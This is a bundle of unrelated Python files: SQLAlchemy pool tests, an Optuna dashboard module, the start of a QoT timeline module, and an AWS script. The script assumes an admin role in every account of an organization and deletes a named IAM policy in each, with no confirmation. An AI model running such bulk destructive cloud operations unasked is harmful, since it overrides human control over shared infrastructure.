assert_raises_context_ok(Exception, p.connect)
eq_(p._overflow, 0)
eq_(p.checkedout(), 0) # and not 1
dbapi.shutdown(False)
c1 = self._with_teardown(p.connect()) # noqa
assert p._pool.empty() # poolsize is one, so we're empty OK
c2 = self._with_teardown(p.connect()) # noqa
eq_(p._overflow, 1) # and not 2
# this hangs if p._overflow is 2
c3 = self._with_teardown(p.connect())
c3.close()
def test_error_on_pooled_reconnect_cleanup_invalidate(self):
dbapi, p = self._queuepool_dbapi_fixture(pool_size=1, max_overflow=2)
c1 = p.connect()
c1.invalidate()
c1.close()
self._assert_cleanup_on_pooled_reconnect(dbapi, p)
@testing.requires.timing_intensive
def test_error_on_pooled_reconnect_cleanup_recycle(self):
dbapi, p = self._queuepool_dbapi_fixture(
pool_size=1, max_overflow=2, recycle=1
)
c1 = p.connect()
c1.close()
time.sleep(1.5)
self._assert_cleanup_on_pooled_reconnect(dbapi, p)
@testing.requires.timing_intensive
def test_connect_handler_not_called_for_recycled(self):
"""test [ticket:3497]"""
dbapi, p = self._queuepool_dbapi_fixture(pool_size=2, max_overflow=2)
canary = Mock()
c1 = p.connect()
c2 = p.connect()
c1.close()
c2.close()
dbapi.shutdown(True)
# ensure pool invalidate time will be later than starttime
# for ConnectionRecord objects above
time.sleep(0.1)
bad = p.connect()
p._invalidate(bad)
bad.close()
assert p._invalidate_time
event.listen(p, "connect", canary.connect)
event.listen(p, "checkout", canary.checkout)
assert_raises(Exception, p.connect)
p._pool.queue = collections.deque(
[c for c in p._pool.queue if c.connection is not None]
)
dbapi.shutdown(False)
c = p.connect()
c.close()
eq_(
canary.mock_calls,
[call.connect(ANY, ANY), call.checkout(ANY, ANY, ANY)],
)
@testing.requires.timing_intensive
def test_connect_checkout_handler_always_gets_info(self):
"""test [ticket:3497]"""
dbapi, p = self._queuepool_dbapi_fixture(pool_size=2, max_overflow=2)
c1 = p.connect()
c2 = p.connect()
c1.close()
c2.close()
dbapi.shutdown(True)
# ensure pool invalidate time will be later than starttime
# for ConnectionRecord objects above
time.sleep(0.1)
bad = p.connect()
p._invalidate(bad)
bad.close()
assert p._invalidate_time
@event.listens_for(p, "connect")
def connect(conn, conn_rec):
conn_rec.info["x"] = True
@event.listens_for(p, "checkout")
def checkout(conn, conn_rec, conn_f):
assert "x" in conn_rec.info
assert_raises(Exception, p.connect)
p._pool.queue = collections.deque(
[c for c in p._pool.queue if c.connection is not None]
)
dbapi.shutdown(False)
c = p.connect()
c.close()
def test_error_on_pooled_reconnect_cleanup_wcheckout_event(self):
dbapi, p = self._queuepool_dbapi_fixture(pool_size=1, max_overflow=2)
c1 = p.connect()
c1.close()
@event.listens_for(p, "checkout")
def handle_checkout_event(dbapi_con, con_record, con_proxy):
if dbapi.is_shutdown:
raise tsa.exc.DisconnectionError()
self._assert_cleanup_on_pooled_reconnect(dbapi, p)
@testing.requires.predictable_gc
def test_userspace_disconnectionerror_weakref_finalizer(self):
dbapi, pool = self._queuepool_dbapi_fixture(
pool_size=1, max_overflow=2
)
@event.listens_for(pool, "checkout")
def handle_checkout_event(dbapi_con, con_record, con_proxy):
if getattr(dbapi_con, "boom") == "yes":
raise tsa.exc.DisconnectionError()
conn = pool.connect()
old_dbapi_conn = conn.connection
conn.close()
eq_(old_dbapi_conn.mock_calls, [call.rollback()])
old_dbapi_conn.boom = "yes"
conn = pool.connect()
dbapi_conn = conn.connection
del conn
gc_collect()
# new connection was reset on return appropriately
eq_(dbapi_conn.mock_calls, [call.rollback()])
# old connection was just closed - did not get an
# erroneous reset on return
eq_(old_dbapi_conn.mock_calls, [call.rollback(), call.close()])
@testing.requires.timing_intensive
def test_recycle_pool_no_race(self):
def slow_close():
slow_closing_connection._slow_close()
time.sleep(0.5)
slow_closing_connection = Mock()
slow_closing_connection.connect.return_value.close = slow_close
class Error(Exception):
pass
dialect = Mock()
dialect.is_disconnect = lambda *arg, **kw: True
dialect.dbapi.Error = Error
pools = []
class TrackQueuePool(pool.QueuePool):
def __init__(self, *arg, **kw):
pools.append(self)
super(TrackQueuePool, self).__init__(*arg, **kw)
def creator():
return slow_closing_connection.connect()
p1 = TrackQueuePool(creator=creator, pool_size=20)
from sqlalchemy import create_engine
eng = create_engine(testing.db.url, pool=p1, _initialize=False)
eng.dialect = dialect
# 15 total connections
conns = [eng.connect() for i in range(15)]
# return 8 back to the pool
for conn in conns[3:10]:
conn.close()
def attempt(conn):
time.sleep(random.random())
try:
conn._handle_dbapi_exception(
Error(), "statement", {}, Mock(), Mock()
)
except tsa.exc.DBAPIError:
pass
# run an error + invalidate operation on the remaining 7 open
# connections
threads = []
for conn in conns:
t = threading.Thread(target=attempt, args=(conn,))
t.start()
threads.append(t)
for t in threads:
t.join()
# return all 15 connections to the pool
for conn in conns:
conn.close()
# re-open 15 total connections
conns = [eng.connect() for i in range(15)]
# 15 connections have been fully closed due to invalidate
assert slow_closing_connection._slow_close.call_count == 15
# 15 initial connections + 15 reconnections
assert slow_closing_connection.connect.call_count == 30
assert len(pools) <= 2, len(pools)
def test_invalidate(self):
p = self._queuepool_fixture(pool_size=1, max_overflow=0)
c1 = p.connect()
c_id = c1.connection.id
c1.close()
c1 = None
c1 = p.connect()
assert c1.connection.id == c_id
c1.invalidate()
c1 = None
c1 = p.connect()
assert c1.connection.id != c_id
def test_recreate(self):
p = self._queuepool_fixture(
reset_on_return=None, pool_size=1, max_overflow=0
)
p2 = p.recreate()
assert p2.size() == 1
assert p2._reset_on_return is pool.reset_none
assert p2._max_overflow == 0
def test_reconnect(self):
"""tests reconnect operations at the pool level. SA's
engine/dialect includes another layer of reconnect support for
'database was lost' errors."""
dbapi, p = self._queuepool_dbapi_fixture(pool_size=1, max_overflow=0)
c1 = p.connect()
c_id = c1.connection.id
c1.close()
c1 = None
c1 = p.connect()
assert c1.connection.id == c_id
dbapi.raise_error = True
c1.invalidate()
c1 = None
c1 = p.connect()
assert c1.connection.id != c_id
def test_detach(self):
dbapi, p = self._queuepool_dbapi_fixture(pool_size=1, max_overflow=0)
c1 = p.connect()
c1.detach()
c2 = p.connect() # noqa
eq_(dbapi.connect.mock_calls, [call("foo.db"), call("foo.db")])
c1_con = c1.connection
assert c1_con is not None
eq_(c1_con.close.call_count, 0)
c1.close()
eq_(c1_con.close.call_count, 1)
def test_detach_via_invalidate(self):
dbapi, p = self._queuepool_dbapi_fixture(pool_size=1, max_overflow=0)
c1 = p.connect()
c1_con = c1.connection
c1.invalidate()
assert c1.connection is None
eq_(c1_con.close.call_count, 1)
c2 = p.connect()
assert c2.connection is not c1_con
c2_con = c2.connection
c2.close()
eq_(c2_con.close.call_count, 0)
def test_no_double_checkin(self):
p = self._queuepool_fixture(pool_size=1)
c1 = p.connect()
rec = c1._connection_record
c1.close()
assert_raises_message(
Warning, "Double checkin attempted on %s" % rec, rec.checkin
)
def test_lifo(self):
c1, c2, c3 = Mock(), Mock(), Mock()
connections = [c1, c2, c3]
def creator():
return connections.pop(0)
p = pool.QueuePool(creator, use_lifo=True)
pc1 = p.connect()
pc2 = p.connect()
pc3 = p.connect()
pc1.close()
pc2.close()
pc3.close()
for i in range(5):
pc1 = p.connect()
is_(pc1.connection, c3)
pc1.close()
pc1 = p.connect()
is_(pc1.connection, c3)
pc2 = p.connect()
is_(pc2.connection, c2)
pc2.close()
pc3 = p.connect()
is_(pc3.connection, c2)
pc2 = p.connect()
is_(pc2.connection, c1)
pc2.close()
pc3.close()
pc1.close()
def test_fifo(self):
c1, c2, c3 = Mock(), Mock(), Mock()
connections = [c1, c2, c3]
def creator():
return connections.pop(0)
p = pool.QueuePool(creator)
pc1 = p.connect()
pc2 = p.connect()
pc3 = p.connect()
pc1.close()
pc2.close()
pc3.close()
pc1 = p.connect()
is_(pc1.connection, c1)
pc1.close()
pc1 = p.connect()
is_(pc1.connection, c2)
pc2 = p.connect()
is_(pc2.connection, c3)
pc2.close()
pc3 = p.connect()
is_(pc3.connection, c1)
pc2 = p.connect()
is_(pc2.connection, c3)
pc2.close()
pc3.close()
pc1.close()
class ResetOnReturnTest(PoolTestBase):
def _fixture(self, **kw):
dbapi = Mock()
return (
dbapi,
pool.QueuePool(creator=lambda: dbapi.connect("foo.db"), **kw),
)
def test_plain_rollback(self):
dbapi, p = self._fixture(reset_on_return="rollback")
c1 = p.connect()
c1.close()
assert dbapi.connect().rollback.called
assert not dbapi.connect().commit.called
def test_plain_commit(self):
dbapi, p = self._fixture(reset_on_return="commit")
c1 = p.connect()
c1.close()
assert not dbapi.connect().rollback.called
assert dbapi.connect().commit.called
def test_plain_none(self):
dbapi, p = self._fixture(reset_on_return=None)
c1 = p.connect()
c1.close()
assert not dbapi.connect().rollback.called
assert not dbapi.connect().commit.called
def test_agent_rollback(self):
dbapi, p = self._fixture(reset_on_return="rollback")
class Agent(object):
def __init__(self, conn):
self.conn = conn
is_active = True
def rollback(self):
self.conn.special_rollback()
def commit(self):
self.conn.special_commit()
c1 = p.connect()
c1._reset_agent = Agent(c1)
c1.close()
assert dbapi.connect().special_rollback.called
assert not dbapi.connect().special_commit.called
assert not dbapi.connect().rollback.called
assert not dbapi.connect().commit.called
c1 = p.connect()
c1.close()
eq_(dbapi.connect().special_rollback.call_count, 1)
eq_(dbapi.connect().special_commit.call_count, 0)
assert dbapi.connect().rollback.called
assert not dbapi.connect().commit.called
def test_agent_commit(self):
dbapi, p = self._fixture(reset_on_return="commit")
class Agent(object):
def __init__(self, conn):
self.conn = conn
is_active = True
def rollback(self):
self.conn.special_rollback()
def commit(self):
self.conn.special_commit()
c1 = p.connect()
c1._reset_agent = Agent(c1)
c1.close()
assert not dbapi.connect().special_rollback.called
assert dbapi.connect().special_commit.called
assert not dbapi.connect().rollback.called
assert not dbapi.connect().commit.called
c1 = p.connect()
c1.close()
eq_(dbapi.connect().special_rollback.call_count, 0)
eq_(dbapi.connect().special_commit.call_count, 1)
assert not dbapi.connect().rollback.called
assert dbapi.connect().commit.called
def test_reset_agent_disconnect(self):
dbapi, p = self._fixture(reset_on_return="rollback")
class Agent(object):
def __init__(self, conn):
self.conn = conn
def rollback(self):
p._invalidate(self.conn)
raise Exception("hi")
def commit(self):
self.conn.commit()
c1 = p.connect()
c1._reset_agent = Agent(c1)
c1.close()
# no warning raised. We know it would warn due to
# QueuePoolTest.test_no_double_checkin
class SingletonThreadPoolTest(PoolTestBase):
@testing.requires.threading_with_mock
def test_cleanup(self):
self._test_cleanup(False)
# TODO: the SingletonThreadPool cleanup method
# has an unfixed race condition within the "cleanup" system that
# leads to this test being off by one connection under load; in any
# case, this connection will be closed once it is garbage collected.
# this pool is not a production-level pool and is only used for the
# SQLite "memory" connection, and is not very useful under actual
# multi-threaded conditions
# @testing.requires.threading_with_mock
# def test_cleanup_no_gc(self):
# self._test_cleanup(True)
def _test_cleanup(self, strong_refs):
"""test that the pool's connections are OK after cleanup() has
been called."""
dbapi = MockDBAPI()
lock = threading.Lock()
def creator():
# the mock iterator isn't threadsafe...
with lock:
return dbapi.connect()
p = pool.SingletonThreadPool(creator=creator, pool_size=3)
if strong_refs:
sr = set()
def _conn():
c = p.connect()
sr.add(c.connection)
return c
else:
def _conn():
return p.connect()
def checkout():
for x in range(10):
c = _conn()
assert c
c.cursor()
c.close()
time.sleep(0.01)
threads = []
for i in range(10):
th = threading.Thread(target=checkout)
th.start()
threads.append(th)
for th in threads:
th.join(join_timeout)
lp = len(p._all_conns)
is_true(3 <= lp <= 4)
if strong_refs:
still_opened = len([c for c in sr if not c.close.call_count])
eq_(still_opened, 3)
def test_no_rollback_from_nested_connections(self):
dbapi = MockDBAPI()
lock = threading.Lock()
def creator():
# the mock iterator isn't threadsafe...
with lock:
return dbapi.connect()
p = pool.SingletonThreadPool(creator=creator, pool_size=3)
c1 = p.connect()
mock_conn = c1.connection
c2 = p.connect()
is_(c1, c2)
c2.close()
eq_(mock_conn.mock_calls, [])
c1.close()
eq_(mock_conn.mock_calls, [call.rollback()])
class AssertionPoolTest(PoolTestBase):
def test_connect_error(self):
dbapi = MockDBAPI()
p = pool.AssertionPool(creator=lambda: dbapi.connect("foo.db"))
c1 = p.connect() # noqa
assert_raises(AssertionError, p.connect)
def test_connect_multiple(self):
dbapi = MockDBAPI()
p = pool.AssertionPool(creator=lambda: dbapi.connect("foo.db"))
c1 = p.connect()
c1.close()
c2 = p.connect()
c2.close()
c3 = p.connect() # noqa
assert_raises(AssertionError, p.connect)
class NullPoolTest(PoolTestBase):
def test_reconnect(self):
dbapi = MockDBAPI()
p = pool.NullPool(creator=lambda: dbapi.connect("foo.db"))
c1 = p.connect()
c1.close()
c1 = None
c1 = p.connect()
c1.invalidate()
c1 = None
c1 = p.connect()
dbapi.connect.assert_has_calls(
[call("foo.db"), call("foo.db")], any_order=True
)
class StaticPoolTest(PoolTestBase):
def test_recreate(self):
dbapi = MockDBAPI()
def creator():
return dbapi.connect("foo.db")
p = pool.StaticPool(creator)
p2 = p.recreate()
assert p._creator is p2._creator
class CreatorCompatibilityTest(PoolTestBase):
def test_creator_callable_outside_noarg(self):
e = testing_engine()
creator = e.pool._creator
try:
conn = creator()
finally:
conn.close()
def test_creator_callable_outside_witharg(self):
e = testing_engine()
creator = e.pool._creator
try:
conn = creator(Mock())
finally:
conn.close()
def test_creator_patching_arg_to_noarg(self):
e = testing_engine()
creator = e.pool._creator
try:
# the creator is the two-arg form
conn = creator(Mock())
finally:
conn.close()
def mock_create():
return creator()
conn = e.connect()
conn.invalidate()
conn.close()
# test that the 'should_wrap_creator' status
# will dynamically switch if the _creator is monkeypatched.
# patch it with a zero-arg form
with patch.object(e.pool, "_creator", mock_create):
conn = e.connect()
conn.invalidate()
conn.close()
conn = e.connect()
conn.close()
|
DeletePolicyOnAllAccounts.py
|
#!/usr/bin/env python
import boto3
import pprint
import argparse
import csv
from multiprocessing import Process
from botocore.exceptions import ProfileNotFound, ClientError
parser = argparse.ArgumentParser(description="Parallel, multi-account execution")
parser.add_argument('--policy',
type=str )
parser.add_argument('--assume_role',
type=str,
default="CloudCoreAdmin" )
parser.add_argument('--organization_owner_id',
type=str, help="Organization OwnerId",
default="730529347585" )
pargs = parser.parse_args()
def getSessionWithAssumeRole(OwnerId=None,RoleName=None):
arn = "arn:aws:iam::{0}:role/{1}".format(OwnerId,RoleName)
response = boto3.client('sts').assume_role(RoleArn=arn, RoleSessionName="mySession")
session = boto3.Session(
aws_access_key_id = response['Credentials']['AccessKeyId'],
aws_secret_access_key = response['Credentials']['SecretAccessKey'],
aws_session_token = response['Credentials']['SessionToken'] )
return session
def getAccountList(OwnerId=None,RoleName=None):
session = getSessionWithAssumeRole(OwnerId=OwnerId,RoleName=RoleName)
accounts = []
response = session.client('organizations').list_accounts()
while True:
for item in response['Accounts']:
if item['Status'] == 'ACTIVE':
accounts.append(item['Id'])
if 'NextToken' not in response:
break
response = session.client('organizations').list_accounts(NextToken=response['NextToken'])
return accounts
def getItemsWithMaxItems(Session=None,MethodName=None,ClientName=None,ItemListKey=None,**kwargs):
function = getattr(Session.client(ClientName), MethodName)
items = []
response = function(**kwargs)
while True:
for item in response[ItemListKey]:
items.append(item)
if response['IsTruncated'] == False:
break
response = function(Marker=response['Marker'],**kwargs)
return items
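def _listPoliciesExample():
    # Editor's sketch (hedged): getItemsWithMaxItems() is a generic Marker/IsTruncated
    # paginator; here it lists customer-managed policies via the public
    # iam.list_policies API (Scope='Local' is an illustrative choice). Not called
    # anywhere in this script.
    session = boto3.Session()
    return getItemsWithMaxItems(Session=session,
                                ClientName='iam',
                                MethodName='list_policies',
                                ItemListKey='Policies',
                                Scope='Local')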
def delete_policy(Session=None,OwnerId=None,PolicyName=None):
policyArn = "arn:aws:iam::{}:policy/{}".format(OwnerId, PolicyName)
try:
response = Session.client('iam').get_policy(PolicyArn=policyArn)
    except ClientError:
print("[{1}] policy {0} not found".format(PolicyName, OwnerId))
return
Session.client('iam').delete_policy(PolicyArn=policyArn)
def test_role(Session=None,OwnerId=None,RoleName=None):
try:
response = Session.client('iam').get_role(RoleName=RoleName)
    except ClientError:
print("[{1}] role {0} not accessible".format(RoleName, OwnerId))
return
if __name__ == '__main__':
accounts = getAccountList(OwnerId=pargs.organization_owner_id,RoleName=pargs.assume_role)
procs = []
for account in accounts:
session = getSessionWithAssumeRole(OwnerId=account,RoleName=pargs.assume_role)
proc = Process(target=delete_policy, args=(session, account, pargs.policy,))
procs.append(proc)
proc.start()
for proc in procs:
proc.join()
|
dashboard.py
|
try:
import bokeh.command.bootstrap
import bokeh.document # NOQA
import bokeh.layouts
import bokeh.models
import bokeh.models.widgets
import bokeh.plotting
import bokeh.themes
import tornado.gen
_available = True
except ImportError as e:
_available = False
_import_error = e
import collections
import numpy as np
import threading
import time
import optuna.logging
import optuna.structs
import optuna.study
from optuna import type_checking
if type_checking.TYPE_CHECKING:
from typing import Any # NOQA
from typing import Dict # NOQA
from typing import List # NOQA
from typing import Optional # NOQA
_mode = None # type: Optional[str]
_study = None # type: Optional[optuna.study.Study]
_HEADER_FORMAT = '''
<style>
body {{
margin: 20px;
}}
h1, p {{
margin: 10px 0px;
}}
</style>
<h1>Optuna Dashboard (Beta)</h1>
<p>
<b>Study name:</b> {study_name}<br>
</p>
'''
_DATETIME_FORMAT = '%Y-%m-%d %H:%M:%S'
if _available:
class _CompleteTrialsWidget(object):
def __init__(self, trials):
# type: (List[optuna.structs.FrozenTrial]) -> None
complete_trials = [
trial for trial in trials if trial.state == optuna.structs.TrialState.COMPLETE
]
self.trial_ids = set([trial.trial_id for trial in complete_trials])
values = [trial.value for trial in complete_trials]
best_values = np.minimum.accumulate(values, axis=0)
self.cds = bokeh.models.ColumnDataSource({
'#': list(range(len(complete_trials))),
'value': values,
'best_value': best_values,
})
self.best_value = best_values[-1] if complete_trials else np.inf
def create_figure(self):
# type: () -> bokeh.plotting.Figure
figure = bokeh.plotting.figure(height=150)
figure.circle(x='#', y='value', source=self.cds, alpha=0.3, color='navy')
figure.line(x='#', y='best_value', source=self.cds, color='firebrick')
figure.xaxis[0].axis_label = 'Number of Trials'
figure.yaxis[0].axis_label = 'Objective Value'
return figure
def update(self, new_trials):
# type: (List[optuna.structs.FrozenTrial]) -> None
stream_dict = collections.defaultdict(list) # type: Dict[str, List[Any]]
for trial in new_trials:
if trial.state != optuna.structs.TrialState.COMPLETE:
continue
if trial.trial_id in self.trial_ids:
continue
stream_dict['#'].append(len(self.trial_ids))
stream_dict['value'].append(trial.value)
self.best_value = min(self.best_value, trial.value)
stream_dict['best_value'].append(self.best_value)
self.trial_ids.add(trial.trial_id)
if stream_dict:
self.cds.stream(stream_dict)
class _AllTrialsWidget(object):
def __init__(self, trials):
# type: (List[optuna.structs.FrozenTrial]) -> None
self.cds = bokeh.models.ColumnDataSource(self.trials_to_dict(trials))
def create_table(self):
# type: () -> bokeh.models.widgets.DataTable
return bokeh.models.widgets.DataTable(
source=self.cds,
columns=[
bokeh.models.widgets.TableColumn(field=field, title=field) for field in
['number', 'state', 'value', 'params', 'datetime_start', 'datetime_complete']
])
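# Note (added for clarity): update() below pushes incremental changes to the ColumnDataSource:
# rows whose trials changed since the last refresh are sent via cds.patch(), and newly appeared
# trials are appended via cds.stream(), so the DataTable never needs a full rebuild.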
def update(
self,
old_trials, # type: List[optuna.structs.FrozenTrial]
new_trials, # type: List[optuna.structs.FrozenTrial]
):
# type: (...) -> None
modified_indices = []
modified_trials = []
for i, old_trial in enumerate(old_trials):
new_trial = new_trials[i]
if old_trial != new_trial:
modified_indices.append(i)
modified_trials.append(new_trial)
patch_dict = self.trials_to_dict(modified_trials)
patch_dict = {k: list(zip(modified_indices, v)) for k, v in patch_dict.items()}
self.cds.patch(patch_dict)
self.cds.stream(self.trials_to_dict(new_trials[len(old_trials):]))
@staticmethod
def trials_to_dict(trials):
# type: (List[optuna.structs.FrozenTrial]) -> Dict[str, List[Any]]
return {
'number': [trial.number for trial in trials],
'state': [trial.state.name for trial in trials],
'value': [trial.value for trial in trials],
'params': [str(trial.params) for trial in trials],
'datetime_start': [
trial.datetime_start.strftime(_DATETIME_FORMAT)
if trial.datetime_start is not None else None for trial in trials
],
'datetime_complete': [
trial.datetime_complete.strftime(_DATETIME_FORMAT)
if trial.datetime_complete is not None else None for trial in trials
],
}
class _DashboardApp(object):
def __init__(self, study, launch_update_thread):
# type: (optuna.study.Study, bool) -> None
self.study = study
self.launch_update_thread = launch_update_thread
self.lock = threading.Lock()
def __call__(self, doc):
# type: (bokeh.document.Document) -> None
self.doc = doc
self.current_trials = \
self.study.trials # type: Optional[List[optuna.structs.FrozenTrial]]
self.new_trials = None # type: Optional[List[optuna.structs.FrozenTrial]]
self.complete_trials_widget = _CompleteTrialsWidget(self.current_trials)
self.all_trials_widget = _AllTrialsWidget(self.current_trials)
self.doc.title = 'Optuna Dashboard (Beta)'
header = _HEADER_FORMAT.format(study_name=self.study.study_name)
self.doc.add_root(
bokeh.layouts.layout([[bokeh.models.widgets.Div(text=header)],
[self.complete_trials_widget.create_figure()],
[self.all_trials_widget.create_table()]],
sizing_mode='scale_width'))
if self.launch_update_thread:
thread = threading.Thread(target=self.thread_loop)
thread.daemon = True
thread.start()
def thread_loop(self):
# type: () -> None
while True:
time.sleep(1)
new_trials = self.study.trials
with self.lock:
need_to_add_callback = (self.new_trials is None)
self.new_trials = new_trials
if need_to_add_callback:
self.doc.add_next_tick_callback(self.update_callback)
@tornado.gen.coroutine
def update_callback(self):
# type: () -> None
with self.lock:
current_trials = self.current_trials
new_trials = self.new_trials
self.current_trials = self.new_trials
self.new_trials = None
assert current_trials is not None
assert new_trials is not None
self.complete_trials_widget.update(new_trials)
self.all_trials_widget.update(current_trials, new_trials)
def _check_bokeh_availability():
# type: () -> None
if not _available:
raise ImportError(
'Bokeh is not available. Please install Bokeh to use the dashboard. '
'Bokeh can be installed by executing `$ pip install bokeh`. '
'For further information, please refer to the installation guide of Bokeh. '
'(The actual import error is as follows: ' + str(_import_error) + ')')
def _show_experimental_warning():
# type: () -> None
logger = optuna.logging.get_logger(__name__)
logger.warning('Optuna dashboard is still highly experimental. Please use with caution!')
def _get_this_source_path():
# type: () -> str
path = __file__
# Sometimes __file__ points to a *.pyc file, but Bokeh doesn't accept it.
if path.endswith('.pyc'):
path = path[:-1]
return path
def serve(study, bokeh_allow_websocket_origins=None):
# type: (optuna.study.Study, Optional[List[str]]) -> None
global _mode, _study
_check_bokeh_availability()
_show_experimental_warning()
# We want to pass the mode (launch a server, or just write an HTML file?) and the target study
# to our Bokeh app. Unfortunately, because we launch the app through `bokeh.command.bootstrap.main`,
# we cannot pass Python objects to it directly, so we have no choice but to hand them over
# via global variables.
_mode = 'serve'
_study = study
# TODO(akiba): Stop using Bokeh's CLI entry point, and start the HTTP server by ourselves.
# This is not a very clean way to launch the Bokeh server. A seemingly better alternative is to
# instantiate and launch `bokeh.server.server.Server` ourselves. However, with that approach we
# found that, for some reason, CDS updates were not reflected in browsers, at least on Bokeh
# 0.12.15. It would also require a fair amount of server configuration that the single call below
# handles automatically. So, for now, we stick with this approach.
command = ['bokeh', 'serve', '--show', _get_this_source_path()]
if bokeh_allow_websocket_origins is not None:
for bokeh_allow_websocket_origin in bokeh_allow_websocket_origins:
command.extend(['--allow-websocket-origin', bokeh_allow_websocket_origin])
bokeh.command.bootstrap.main(command)
def write(study, out_path):
# type: (optuna.study.Study, str) -> None
global _mode, _study
_check_bokeh_availability()
_show_experimental_warning()
_mode = 'html'
_study = study
bokeh.command.bootstrap.main(['bokeh', 'html', _get_this_source_path(), '-o', out_path])
def _run():
# type: () -> None
# Please note that `_study` and `optuna.dashboard._study` are different here. Here, this module
# is loaded inside Bokeh, and thus it is not `optuna.dashboard`, but `bk_script_????`.
study = optuna.dashboard._study
mode = optuna.dashboard._mode
assert study is not None
app = _DashboardApp(study, launch_update_thread=(mode == 'serve'))
doc = bokeh.plotting.curdoc()
app(doc)
if __name__.startswith('bk_script_'):
# Here, this module is loaded inside Bokeh. Therefore, we should launch the Bokeh app.
_run()
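# Hedged usage sketch (added for illustration; not part of this module). The study name and
# storage URL are placeholders; any persistent Optuna study can be used the same way:
#
#     import optuna
#     study = optuna.create_study(study_name='example-study', storage='sqlite:///example.db')
#     optuna.dashboard.serve(study)                    # launch a Bokeh server (blocking)
#     optuna.dashboard.write(study, 'dashboard.html')  # or render a static HTML snapshot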
|
sherlock_qot_transform.py
|
# @file sherlock_qot_transform.py
# @brief Sherlock QoT Python Transform
# @author Anon D'Anon
#
# Copyright (c) Anon, 2018.
# Copyright (c) Anon Inc., 2018.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
# System calls
import sys
# Argument Parsing
import argparse
# Signal Handlers
import signal
# Module to Read Core Time
import time
# For Type Checking
import inspect
# For Spawning Threads and using Mutex Locks
from threading import Thread, Lock
# JSON Serialization/De-serialization
import json
# Import AsyncIO
import asyncio
# Import Socket Library
import socket
# Import the Math Library
import math
# Import Array Library
import array
# Import OS functionality
import os
# Share Memory
import mmap
# Import C-Style Structs
import struct
# NATS Python 3 Client
from nats.aio.client import Client as NATS
from nats.aio.errors import ErrConnectionClosed, ErrTimeout, ErrNoServers
# Enum Type
from enum import Enum
# Hard coded maximum ring buffer size
MAX_RING_BUFFER_SIZE = 10
# Timeline Socket Path
TL_SOCKET_PATH = "/tmp/qot_timeline"
# Global Variable used to indicate if the binding has been initialized
initialized = False
class ReturnTypes(Enum):
""" class that implements return types as codes """
QOT_RETURN_TYPE_OK = 0 # Return Type OK
QOT_RETURN_TYPE_ERR = 1 # Return Type generic error
QOT_RETURN_TYPE_CONN_ERR = 2 # Connection error to timeline service
def __int__(self):
return self.value
class TimelineMessageTypes(Enum):
""" qot timeline service message codes """
TIMELINE_CREATE = 0 # Create a timeline
TIMELINE_DESTROY = 1 # Destroy a timeline
TIMELINE_UPDATE = 2 # Update timeline binding parameters
TIMELINE_BIND = 3 # Bind to a timeline
TIMELINE_UNBIND = 4 # Unbind from a timeline
TIMELINE_QUALITY = 5 # Get the QoT Spec for this timeline
TIMELINE_INFO = 6 # Get the timeline info
TIMELINE_SHM_CLOCK = 7 # Get the timeline clock rd-only shm fd
TIMELINE_SHM_CLKSYNC = 8 # Get the timeline clock shm fd
TIMELINE_UNDEFINED = 9 # Undefined function
def __int__(self):
return self.value
class TimelineTypes(Enum):
""" Timeline Types enumerated class """
QOT_TIMELINE_LOCAL = 0 # Local Timeline -> Internal or External Reference
QOT_TIMELINE_GLOBAL = 1 # Global Timeline -> Tied to UTC
def __int__(self):
return self.value
class RingBuffer:
""" class that implements a not-yet-full buffer """
def __init__(self,size_max):
self.max = size_max
self.data = []
self.mutex = Lock()
class __Full:
""" class that implements a full buffer """
def append(self, x):
""" Append an element overwriting the oldest one. """
self.mutex.acquire()
try:
self.data[self.cur] = x
self.cur = (self.cur+1) % self.max
finally:
self.mutex.release()
def get(self):
""" return list of elements in correct order """
self.mutex.acquire()
try:
ret_data = self.data[self.cur:]+self.data[:self.cur]
finally:
self.mutex.release()
return ret_data
def append(self, x):
""" Append an element at the end of the buffer. """
print("Added data to ring buffer")
self.mutex.acquire()
try:
self.data.append(x)
if len(self.data) == self.max:
self.cur = 0
# Permanently change self's class from non-full to full
self.__class__ = self.__Full
finally:
self.mutex.release()
def get(self):
""" Return a list of elements from the oldest to the newest. """
self.mutex.acquire()
try:
ret_data = self.data
finally:
self.mutex.release()
return ret_data
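# Illustration (added; not in the original file): the buffer keeps at most `size_max` entries and
# silently overwrites the oldest once full, e.g.
#
#     buf = RingBuffer(3)
#     for n in range(5):
#         buf.append(n)
#     buf.get()   # -> [2, 3, 4], ordered oldest to newest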
class TimelineBinding:
"""TimelineBinding class lets apps bind to a timeline and perform various
time-related operations on the timeline"""
def __init__(self, mode="app"):
# Set the Mode as "transform" or "app"
self._mode = mode
# Initialize Timeline Parameters
self._timeline_uuid = None # Timeline UUID (Unique name)
self._timeline_type = "local" # Timeline type (local or global)
self._timeline_index = -1 # Timeline ID
# Initialize Binding Parameters
self._binding_name = None # Binding Name
self._binding_id = -1 # Binding ID
self._accuracy_ns = None # Accuracy Specification in nanoseconds
self._resolution_ns = None # Resolution Specification in nanoseconds
# Initialize Scheduling Parameters
self._offset_ns = 0 # Scheduling Offset
self._period_ns = 0 # Scheduling Period
# Initialize AsyncIO Loop
if mode == "transform":
self._loop = asyncio.get_event_loop()
# Else: mode defaults to "app"
####### Private Functions #######
# Decorator 1 to Perform Type Checking
def checkargs(function):
